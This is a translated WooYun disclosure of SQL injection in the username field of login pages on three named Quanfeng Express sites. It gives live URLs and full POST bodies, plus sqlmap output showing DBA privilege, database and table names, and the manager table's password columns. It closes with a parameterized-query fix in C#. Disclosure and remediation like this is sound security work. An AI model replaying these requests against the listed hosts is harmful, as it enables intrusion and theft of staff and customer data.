
Vulnerability summary

Defect ID: wooyun-2015-0124791

Title: Quanfeng Express, the same injection point on multiple sites, bundled (DBA privileges, sensitive information disclosure)

Vendor: 全峰快递 (Quanfeng Express)

Author: 路人甲

Submitted: 2015-07-07 19:32

Fix deadline: 2015-08-21 19:32

Published: 2015-08-21 19:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As in the title: the same SQL injection on multiple sites, bundled into one report; requesting 20 Rank.

Detailed description:

One injection point on the main site; the two sub-sites oa and qfoa have the identical injection point, all running with DBA privileges, so a large amount of information is exposed.

SQL injection point
http://www.qfkd.com.cn/setqfkd/login.aspx
POST parameters
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=cmfqiinu&txtUserName=*&txtUserPwd=cmfqiinu&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
The txtUserName parameter is injectable.


Injection on the oa sub-site

http://oa.qfkd.com.cn/setqfkd/login.aspx
POST parameters
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=vtpvrdcv&txtUserName=*&txtUserPwd=vtpvrdcv&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
Injectable parameter: txtUserName


The qfoa site

http://qfoa.qfkd.com.cn/setqfkd/login.aspx
POST parameters
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtUserName=*&txtUserPwd=iumhjsuw&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAZPoml5tC2dbv7RgYErGW9VY3plgk0YBAefRz3MyBlTcE5Fo5u8Nmrtdka2GVrCes085pbWlDO2hADfoPXD/5td8N6b9eOHXDcXf/kfPe5eg06GC4z/e0mb28yRSwVPyac%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYCAgEPFgIeB1Zpc2libGVoZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUNY2JSZW1lbWJlcklkMgUMY2JSZW1lbWJlcklk
The txtUserName parameter is injectable.


Proof of vulnerability:

[Screenshot: oa1.jpg]


Partial data as proof; not everything is listed.
current user: 'qfoa'
current database: 'qfoadb2'
current user is DBA: True
available databases [14]:
[*] ccflow5
[*] DBSynchronous
[*] master
[*] model
[*] msdb
[*] PrintDB
[*] qfhy
[*] qfkd_back
[*] qfoadb2
[*] ReportServer
[*] ReportServerTempDB
[*] SinglePrint
[*] tempdb
[*] ZYSite
Database: qfoadb2
[129 tables]
+----------------------------+
| FB_manager |
| FB_manager_log |
| FB_search_shanghai |
| FB_shanghai_adress |
| FB_shanghai_no_resoult |
| FB_shanghai_resoult |
| FB_site |
| FB_site_address |
| SP_Customer |
| SP_SingleLog |
| TestTable |
| View_BaoXianLiPei |
| View_article_mend |
| View_diaocha |
| View_gzjindu |
| View_jiabanche |
| FB_diqu-biao |
| areas |
| bill_tbdd |
| dt_BaQiang_FuFei |
| dt_BaQiang_IT |
| dt_BaQiang_JiChu |
| dt_BaQiang_ShouFei |
| dt_BaQiang_SongXiu |
| dt_BaQiang_TuiHui |
| dt_BaQiang_ZhanDian |
| dt_BaoXianLiPei |
| dt_BaoXianLiPei_ChuLi |
| dt_BaoXianLiPei_ShenHe |
| dt_BaoXianLiPei_attach |
| dt_K8_FaJian |
| dt_K8_PaiJian |
| dt_K8_ZhongLiang |
| dt_Recruitment |
| dt_RecruitmentDetails |
| dt_amount_log |
| dt_article |
| dt_article_albums |
| dt_article_beizhu |
| dt_article_comment |
| dt_article_content |
| dt_article_download |
| dt_article_goods |
| dt_article_mend |
| dt_article_news |
| dt_article_tit |
| dt_attribute_value |
| dt_attributes |
| dt_baobiao_tongji |
| dt_category |
| dt_danpo |
| dt_danpo_news |
| dt_danwu |
| dt_danwu_news |
| dt_danyi |
| dt_danyi_news |
| dt_dcmingxi |
| dt_dczong |
| dt_distribution |
| dt_download_attach |
| dt_goods_group_price |
| dt_gzjindu |
| dt_jiabanche_genzong |
| dt_jiabanchedengji |
| dt_jiabanchejichu |
| dt_jiekuan_attach |
| dt_jiekuan_duiwai |
| dt_jiekuan_fuzeren |
| dt_jiekuan_geren |
| dt_jiekuan_gongsi |
| dt_jiekuan_jingying |
| dt_jiekuan_shengming |
| dt_jiekuan_shenqing |
| dt_jiekuan_tuijian |
| dt_jiekuan_tuotou |
| dt_jiekuan_tuotouS |
| dt_jiekuan_tuotouY |
| dt_jiekuan_wangdian |
| dt_jiekuan_xinyong |
| dt_jiekuan_yue |
| dt_jindu_content |
| dt_khjichu |
| dt_kpjichu |
| dt_kpmingxi |
| dt_kpzong |
| dt_loginlog |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_type |
| dt_manager_role_type_value |
| dt_manager_role_value |
| dt_manager_value |
| dt_nbtszdwh |
| dt_pqjlwh |
| dt_price |
| dt_qiandao_fx |
| dt_qiandao_fxls |
| dt_qiandao_hy |
| dt_qiandao_ry |
| dt_qiandao_ryls |
| dt_read |
| dt_rypingfen |
| dt_saixuan |
| dt_sys_channel |
| dt_sys_model |
| dt_sys_model_nav |
| dt_tousujianyi |
| dt_urllogin |
| dt_web |
| dt_web_content |
| dt_web_news |
| dt_zdpingfen |
| dt_zhiwei |
| sqlmapoutput |
| sysdiagrams |
| view_P2P_jiekuan |
| view_article_content |
| view_article_download |
| view_article_goods |
| view_article_news |
| view_danpo_news |
| view_danwu_news |
| view_danyi_news |
| view_qiandao_tuifang |
| view_sys_channel |
| view_web_content |
| view_web_news |
+----------------------------+
Database: qfoadb2
Table: dt_manager
[18 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| add_time | datetime |
| Answer | nvarchar |
| category_id | int |
| email | nvarchar |
| id | int |
| is_lock | int |
| k8username | nvarchar |
| Question | nvarchar |
| real_name | nvarchar |
| remark | nvarchar |
| role_id | nvarchar |
| role_type | int |
| SID | nvarchar |
| telephone | nvarchar |
| user_name | nvarchar |
| user_pwd | nvarchar |
| wangdian | nvarchar |
| zhiwei | int |
+-------------+----------+


[Screenshot: oa2.jpg]


[Screenshot: oa3.jpg]


[Screenshot: oa4.jpg]

Fix recommendation:

Filter the parameters.
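The filtering the author recommends is most reliably achieved by keeping user input out of the query text entirely. The following is an added example, not Quanfeng's code and not taken from this report, of a parameterized login lookup for an ASP.NET WebForms page backed by SQL Server, such as the setqfkd/login.aspx pages listed above, together with a startup check for the second finding in the sqlmap output ("current user is DBA: True"). The table and column names (dt_manager, user_name, user_pwd, is_lock) are the ones shown in the proof section; the connection-string name "QfoaDb", the stored password format, and every method name are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;

// Added example (not the vendor's code). Assumed: a connection string named
// "QfoaDb" in web.config and passwords stored as "<iterations>$<salt>$<hash>".
public static class SafeLogin
{
    // Vulnerable pattern this replaces: building the statement by string
    // concatenation, which lets the value of txtUserName be parsed as SQL:
    //   "SELECT user_pwd FROM dt_manager WHERE user_name='" + txtUserName.Text + "'"
    private const string LookupSql =
        "SELECT user_pwd, is_lock FROM dt_manager WHERE user_name = @user";

    // Called from the btnSubmit click handler with txtUserName.Text / txtUserPwd.Text.
    public static bool Authenticate(string userName, string password)
    {
        if (string.IsNullOrEmpty(userName) || string.IsNullOrEmpty(password))
            return false;

        string connStr = ConfigurationManager.ConnectionStrings["QfoaDb"].ConnectionString;

        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(LookupSql, conn))
        {
            // A typed parameter is sent separately from the query text, so a
            // quote, comment sequence or stacked statement inside it has no
            // SQL meaning. The length cap matches the column, not the attacker.
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 50).Value = userName;

            conn.Open();
            using (SqlDataReader rd = cmd.ExecuteReader(CommandBehavior.SingleRow))
            {
                if (!rd.Read())
                    return false;                       // unknown user
                bool locked = !rd.IsDBNull(1) && rd.GetInt32(1) != 0;
                string stored = rd.GetString(0);
                return !locked && VerifyPassword(password, stored);
            }
        }
    }

    // Assumed stored format: "<iterations>$<base64 salt>$<base64 PBKDF2-SHA256 hash>".
    private static bool VerifyPassword(string password, string stored)
    {
        string[] parts = stored.Split('$');
        if (parts.Length != 3)
            return false;
        int iterations = int.Parse(parts[0]);
        byte[] salt = Convert.FromBase64String(parts[1]);
        byte[] expected = Convert.FromBase64String(parts[2]);
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations, HashAlgorithmName.SHA256))
        {
            byte[] actual = kdf.GetBytes(expected.Length);
            return FixedTimeEquals(actual, expected);
        }
    }

    // Constant-time comparison so a wrong hash takes the same time regardless
    // of where the first differing byte is.
    private static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        if (a.Length != b.Length)
            return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++)
            diff |= a[i] ^ b[i];
        return diff == 0;
    }

    // Startup check: the application's database login must not be a member of
    // the sysadmin server role. With DBA rights, a single injectable parameter
    // exposes every database on the instance, as the sqlmap listing above shows.
    public static bool AppLoginIsSysadmin(string connStr)
    {
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand("SELECT IS_SRVROLEMEMBER('sysadmin')", conn))
        {
            conn.Open();
            object result = cmd.ExecuteScalar();
            return result != DBNull.Value && Convert.ToInt32(result) == 1;
        }
    }
}
```

Input validation on txtUserName (length and character allow-list) is still worthwhile for logging and for rejecting obviously malformed requests, but it is a secondary control; the parameterized statement is what removes the injection, and running the application under a login that fails AppLoginIsSysadmin is what limits the blast radius if another flaw is found.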

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.